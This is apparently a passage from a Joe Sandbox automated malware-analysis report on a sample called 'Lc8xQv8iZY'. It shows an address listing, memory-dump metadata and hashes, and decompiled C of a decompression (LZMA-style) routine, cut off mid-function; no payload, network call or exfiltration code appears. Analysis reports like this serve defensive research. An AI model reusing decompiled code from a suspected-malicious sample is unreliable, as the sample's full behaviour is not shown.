                                                  0x0040698f
                                                  0x00406992
                                                  0x0040699c
                                                  0x00000000
                                                  0x0040699c
                                                  0x0040696f
                                                  0x00406972
                                                  0x00406976
                                                  0x00406979
                                                  0x00406979
                                                  0x0040697c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406a2a
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a4f
                                                  0x00406a56
                                                  0x00406a5d
                                                  0x00406a5d
                                                  0x00000000
                                                  0x00406a5d
                                                  0x00406a2c
                                                  0x00406a2f
                                                  0x00406a32
                                                  0x00406a35
                                                  0x00406a3c
                                                  0x00406980
                                                  0x00406980
                                                  0x00406983
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b17
                                                  0x00406b1a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406751
                                                  0x00406753
                                                  0x0040675a
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00000000
                                                  0x00000000
                                                  0x00406768
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406772
                                                  0x00406772
                                                  0x00406773
                                                  0x00406776
                                                  0x0040677d
                                                  0x00406780
                                                  0x0040678e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a64
                                                  0x00406a64
                                                  0x00406a67
                                                  0x00406a6e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a73
                                                  0x00406a73
                                                  0x00406a77
                                                  0x00406baf
                                                  0x00000000
                                                  0x00406baf
                                                  0x00406a7d
                                                  0x00406a80
                                                  0x00406a83
                                                  0x00406a87
                                                  0x00406a8a
                                                  0x00406a90
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a95
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a9b
                                                  0x00406a9b
                                                  0x00406a9f
                                                  0x00406aff
                                                  0x00406b02
                                                  0x00406b07
                                                  0x00406b08
                                                  0x00406b0a
                                                  0x00406b0c
                                                  0x00406b0f
                                                  0x00000000
                                                  0x00406b0f
                                                  0x00406aa1
                                                  0x00406aa7
                                                  0x00406aaa
                                                  0x00406aad
                                                  0x00406ab0
                                                  0x00406ab3
                                                  0x00406ab6
                                                  0x00406ab9
                                                  0x00406abc
                                                  0x00406abf
                                                  0x00406ac2
                                                  0x00406adb
                                                  0x00406ade
                                                  0x00406ae1
                                                  0x00406ae4
                                                  0x00406ae8
                                                  0x00406aea
                                                  0x00406aea
                                                  0x00406aeb
                                                  0x00406aee
                                                  0x00406ac4
                                                  0x00406ac4
                                                  0x00406acc
                                                  0x00406ad1
                                                  0x00406ad3
                                                  0x00406ad6
                                                  0x00406ad6
                                                  0x00406af1
                                                  0x00406af8
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406796
                                                  0x00406799
                                                  0x004067cf
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x00406902
                                                  0x00406902
                                                  0x00406905
                                                  0x00406907
                                                  0x00406b91
                                                  0x00000000
                                                  0x00406b91
                                                  0x0040690d
                                                  0x00406910
                                                  0x00000000
                                                  0x00000000
                                                  0x00406916
                                                  0x0040691a
                                                  0x0040691d
                                                  0x0040691d
                                                  0x0040691d
                                                  0x00000000
                                                  0x0040691d
                                                  0x0040679b
                                                  0x0040679d
                                                  0x0040679f
                                                  0x004067a1
                                                  0x004067a4
                                                  0x004067a5
                                                  0x004067a7
                                                  0x004067a9
                                                  0x004067ac
                                                  0x004067af
                                                  0x004067c5
                                                  0x004067ca
                                                  0x00406802
                                                  0x00406802
                                                  0x00406806
                                                  0x00406832
                                                  0x00406834
                                                  0x0040683b
                                                  0x0040683e
                                                  0x00406841
                                                  0x00406841
                                                  0x00406846
                                                  0x00406846
                                                  0x00406848
                                                  0x0040684b
                                                  0x00406852
                                                  0x00406855
                                                  0x00406882
                                                  0x00406882
                                                  0x00406885
                                                  0x00406888
                                                  0x004068fc
                                                  0x004068fc
                                                  0x004068fc
                                                  0x00000000
                                                  0x004068fc
                                                  0x0040688a
                                                  0x00406890
                                                  0x00406893
                                                  0x00406896
                                                  0x00406899
                                                  0x0040689c
                                                  0x0040689f
                                                  0x004068a2
                                                  0x004068a5
                                                  0x004068a8
                                                  0x004068ab
                                                  0x004068c4
                                                  0x004068c6
                                                  0x004068c9
                                                  0x004068ca
                                                  0x004068cd
                                                  0x004068cf
                                                  0x004068d2
                                                  0x004068d4
                                                  0x004068d6
                                                  0x004068d9
                                                  0x004068db
                                                  0x004068de
                                                  0x004068e2
                                                  0x004068e4
                                                  0x004068e4
                                                  0x004068e5
                                                  0x004068e8
                                                  0x004068eb
                                                  0x004068ad
                                                  0x004068ad
                                                  0x004068b5
                                                  0x004068ba
                                                  0x004068bc
                                                  0x004068bf
                                                  0x004068bf
                                                  0x004068ee
                                                  0x004068f5
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x00000000
                                                  0x004068f7
                                                  0x00000000
                                                  0x004068f7
                                                  0x004068f5
                                                  0x00406808
                                                  0x0040680b
                                                  0x0040680d
                                                  0x00406810
                                                  0x00406813
                                                  0x00406816
                                                  0x00406818
                                                  0x0040681b
                                                  0x0040681e
                                                  0x0040681e
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x0040682b
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x00000000
                                                  0x0040682d
                                                  0x00000000
                                                  0x0040682d
                                                  0x0040682b
                                                  0x004067b1
                                                  0x004067b4
                                                  0x004067b6
                                                  0x004067b9
                                                  0x00000000
                                                  0x00000000
                                                  0x00406518
                                                  0x00406518
                                                  0x0040651c
                                                  0x00406b61
                                                  0x00000000
                                                  0x00406b61
                                                  0x00406522
                                                  0x00406525
                                                  0x00406528
                                                  0x0040652b
                                                  0x0040652e
                                                  0x00406531
                                                  0x00406534
                                                  0x00406536
                                                  0x00406539
                                                  0x0040653c
                                                  0x0040653f
                                                  0x00406541
                                                  0x00406541
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406920
                                                  0x00406920
                                                  0x00406920
                                                  0x00406924
                                                  0x00000000
                                                  0x00000000
                                                  0x0040692a
                                                  0x0040692d
                                                  0x00406930
                                                  0x00406933
                                                  0x00406935
                                                  0x00406935
                                                  0x00406935
                                                  0x00406938
                                                  0x0040693b
                                                  0x0040693e
                                                  0x00406941
                                                  0x00406944
                                                  0x00406947
                                                  0x00406948
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694d
                                                  0x00406950
                                                  0x00406953
                                                  0x00406956
                                                  0x00406959
                                                  0x0040695d
                                                  0x0040695f
                                                  0x00406962
                                                  0x00000000
                                                  0x00406964
                                                  0x00000000
                                                  0x00406964
                                                  0x00406962
                                                  0x00406b97
                                                  0x00000000
                                                  0x00000000
                                                  0x004061c6

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
                                                  • Instruction ID: 56628f401a4fc6d73e137493fcd66a1037cbd66c5efac646bb7951d26cabb475
                                                  • Opcode Fuzzy Hash: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
                                                  • Instruction Fuzzy Hash: CF815871D00228CFDF24CFA8C8447ADBBB1FB45305F25816AD856BB281D7789A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406184 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00406184(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406BD6))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
